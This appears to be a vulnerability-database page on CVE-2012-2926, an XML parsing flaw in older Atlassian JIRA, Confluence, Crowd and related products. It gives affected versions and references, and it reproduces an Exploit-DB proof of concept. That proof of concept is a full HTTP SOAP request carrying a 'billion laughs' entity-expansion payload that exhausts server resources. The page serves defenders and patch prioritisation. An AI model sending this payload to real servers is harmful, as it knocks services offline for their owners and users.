CVE-2012-2926
Description
Atlassian JIRA before 5.0.1; Confluence before 3.5.16, 4.0 before 4.0.7, and 4.1 before 4.1.10; FishEye and Crucible before 2.5.8, 2.6 before 2.6.8, and 2.7 before 2.7.12; Bamboo before 3.3.4 and 3.4.x before 3.4.5; and Crowd before 2.0.9, 2.1 before 2.1.2, 2.2 before 2.2.9, 2.3 before 2.3.7, and 2.4 before 2.4.1 do not properly restrict the capabilities of third-party XML parsers, which allows remote attackers to read arbitrary files or cause a denial of service (resource consumption) via unspecified vectors.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Atlassian Tempo 6.4.3 / JIRA 5.0.0 / Gliffy 3.7.0 - XML Parsing Denial of Service
source: https://www.securityfocus.com/bid/53595/info
JIRA, and the Gliffy and Tempo plugins for JIRA are prone to a denial-of-service vulnerability because they fail to properly handle crafted XML data.
Exploiting this issue allows remote attackers to cause denial-of-service conditions in the context of an affected application.
The following versions are affected:
Versions prior to JIRA 5.0.1 are vulnerable.
Versions prior to Gliffy 3.7.1 are vulnerable.
Versions prior to Tempo versions 6.4.3.1, 6.5.1, and 7.0.3 are vulnerable.
POST somehost.com HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
User-Agent: Jakarta Commons-HttpClient/3.1
Host: somehost.com
Content-Length: 1577
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:SecurityServer" xmlns:aut="http://authentication.integration.crowd.atlassian.com">
<soapenv:Header/>
<soapenv:Body>
<urn:authenticateApplication>
<urn:in0>
<aut:credential>
<aut:credential>stuff1</aut:credential>
<aut:encryptedCredential>?&lol9;</aut:encryptedCredential>
</aut:credential>
<aut:name>stuff3</aut:name>
<aut:validationFactors>
<aut:ValidationFactor>
<aut:name>stuff4</aut:name>
<aut:value>stuff5</aut:value>
</aut:ValidationFactor>
</aut:validationFactors>
</urn:in0>
</urn:authenticateApplication>
</soapenv:Body>
</soapenv:Envelope>Metasploit modules
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| atlassian | bamboo | {"endExcluding":"3.3.4"} | 3.3.4 |
| atlassian | confluence | {"endExcluding":"3.5.16"} | 3.5.16 |
| atlassian | confluence_server | {"startIncluding":"4.0","endExcluding":"4.0.7"} | 4.0.7 |
| atlassian | crowd | {"endExcluding":"2.0.9"} | 2.0.9 |
| atlassian | crucible | {"endExcluding":"2.5.8"} | 2.5.8 |
| atlassian | fisheye | {"endExcluding":"2.5.8"} | 2.5.8 |
| atlassian | jira | {"endExcluding":"5.0.1"} | 5.0.1 |
References
- http://confluence.atlassian.com/display/BAMBOO/Bamboo+Security+Advisory+2012-05-17
- http://confluence.atlassian.com/display/CROWD/Crowd+Security+Advisory+2012-05-17
- http://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+2012-05-17
- http://confluence.atlassian.com/display/FISHEYE/FishEye+and+Crucible+Security+Advisory+2012-05-17
- http://confluence.atlassian.com/display/JIRA/JIRA+Security+Advisory+2012-05-17
- http://osvdb.org/81993
- http://secunia.com/advisories/49146
- http://www.securityfocus.com/bid/53595
- https://exchange.xforce.ibmcloud.com/vulnerabilities/75682
- https://exchange.xforce.ibmcloud.com/vulnerabilities/75697
- http://confluence.atlassian.com/display/BAMBOO/Bamboo+Security+Advisory+2012-05-17
- http://confluence.atlassian.com/display/CROWD/Crowd+Security+Advisory+2012-05-17
- http://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+2012-05-17
- http://confluence.atlassian.com/display/FISHEYE/FishEye+and+Crucible+Security+Advisory+2012-05-17
- http://confluence.atlassian.com/display/JIRA/JIRA+Security+Advisory+2012-05-17
- http://osvdb.org/81993
- http://secunia.com/advisories/49146
- http://www.securityfocus.com/bid/53595
- https://exchange.xforce.ibmcloud.com/vulnerabilities/75682
- https://exchange.xforce.ibmcloud.com/vulnerabilities/75697
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.